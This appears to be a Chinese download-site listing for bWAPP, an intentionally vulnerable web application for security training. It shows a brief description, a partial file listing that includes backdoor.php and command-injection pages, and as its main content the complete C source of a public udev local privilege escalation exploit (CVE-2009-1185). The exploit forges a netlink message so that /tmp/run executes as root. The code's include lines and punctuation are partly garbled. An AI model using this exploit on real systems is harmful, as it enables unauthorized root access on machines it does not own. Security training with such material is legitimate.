资源简介
buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵 盖了所有主要的已知Web漏洞,包括OWASP Top10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。
代码片段和文件信息
/*
* cve-2009-1185.c
*
* udev < 141 Local Privilege Escalation Exploit
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
*
* udev before 1.4.1 does not verify whether a NETlink message originates
* from kernel space which allows local users to gain privileges by sending
* a NETlink message from user space.
*
* Notes:
*
* An alternate version of kcope‘s exploit. This exploit leverages the
* 95-udev-late.rules functionality that is meant to run arbitrary commands
* when a device is removed. A bit cleaner and reliable as long as your
* distro ships that rule file.
*
* Tested on Gentoo Intrepid and Jaunty.
*
* Usage:
*
* Pass the PID of the udevd netlink socket (listed in /proc/net/netlink
* usually is the udevd PID minus 1) as argv[1].
*
* The exploit will execute /tmp/run as root so throw whatever payload you
* want in there.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include nk.h>
#ifndef NETlink_Kobject_UEVENT
#define NETlink_Kobject_UEVENT 15
#endif
int
main(int argc char **argv)
{
int sock;
char *mp *err;
char message[4096];
struct stat st;
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
if (argc < 2) {
err = “Pass the udevd netlink PID as an argument“;
printf(“[-] Error: %s\n“ err);
exit(1);
}
if ((stat(“/etc/udev/rules.d/95-udev-late.rules“ &st) == -1) &&
(stat(“/lib/udev/rules.d/95-udev-late.rules“ &st) == -1)) {
err = “Required 95-udev-late.rules not found“;
printf(“[-] Error: %s\n“ err);
exit(1);
}
if (stat(“/tmp/run“ &st) == -1) {
err = “/tmp/run does not exist please create it“;
printf(“[-] Error: %s\n“ err);
exit(1);
}
system(“chmod +x /tmp/run“);
memset(&address 0 sizeof(address));
address.nl_family = AF_NETlink;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETlink SOCK_DGRAM NETlink_Kobject_UEVENT);
bind(sock (struct sockaddr *) &address sizeof(address));
mp = message;
mp += sprintf(mp “remove@/d“) + 1;
mp += sprintf(mp “SUBSYSTEM=block“) + 1;
mp += sprintf(mp “DEVPATH=/dev/foo“) + 1;
mp += sprintf(mp “TIMEOUT=10“) + 1;
mp += sprintf(mp “ACTION=remove“) +1;
mp += sprintf(mp “REMOVE_CMD=/tmp/run“) +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock &msg 0);
close(sock);
return 0;
}
// milw0rm.com [2009-04-30]
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 112 2014-03-08 15:05 bWAPP\666
文件 4471 2014-09-27 17:58 bWAPP\admin\index.php
文件 645 2014-05-01 21:51 bWAPP\admin\phpinfo.php
文件 2226 2014-09-29 11:00 bWAPP\admin\settings.php
文件 2093 2014-05-11 00:27 bWAPP\aim.php
文件 55719 2014-05-11 02:41 bWAPP\apps\movie_search
文件 6623 2014-09-27 01:57 bWAPP\ba_captcha_bypass.php
文件 10033 2014-09-27 01:57 bWAPP\ba_forgotten.php
文件 1208 2014-05-01 21:51 bWAPP\ba_insecure_login.php
文件 7551 2014-09-27 01:57 bWAPP\ba_insecure_login_1.php
文件 9338 2014-09-27 01:57 bWAPP\ba_insecure_login_2.php
文件 7471 2014-09-27 01:57 bWAPP\ba_insecure_login_3.php
文件 4848 2014-09-27 01:57 bWAPP\ba_logout.php
文件 1737 2014-05-18 20:56 bWAPP\ba_logout_1.php
文件 1200 2014-05-01 21:51 bWAPP\ba_pwd_attacks.php
文件 7524 2014-09-27 01:57 bWAPP\ba_pwd_attacks_1.php
文件 7914 2014-09-27 01:57 bWAPP\ba_pwd_attacks_2.php
文件 8212 2014-09-27 01:57 bWAPP\ba_pwd_attacks_3.php
文件 8039 2014-09-27 01:57 bWAPP\ba_pwd_attacks_4.php
文件 5894 2014-09-27 01:57 bWAPP\ba_weak_pwd.php
文件 732 2014-03-29 20:04 bWAPP\backdoor.php
文件 5907 2014-09-27 01:57 bWAPP\bof_1.php
文件 4804 2014-09-27 01:57 bWAPP\bof_2.php
文件 7858 2014-11-02 22:57 bWAPP\bugs.txt
文件 1821 2014-05-01 21:51 bWAPP\captcha.php
文件 1101 2014-05-01 21:51 bWAPP\captcha_box.php
文件 5941 2014-09-27 01:57 bWAPP\clickjacking.php
文件 5584 2014-09-27 01:57 bWAPP\commandi.php
文件 6133 2014-09-27 01:57 bWAPP\commandi_blind.php
文件 780 2014-05-01 21:51 bWAPP\config.inc
文件 963 2014-05-01 21:51 bWAPP\config.inc.php
............此处省略251个文件信息
评论
共有 条评论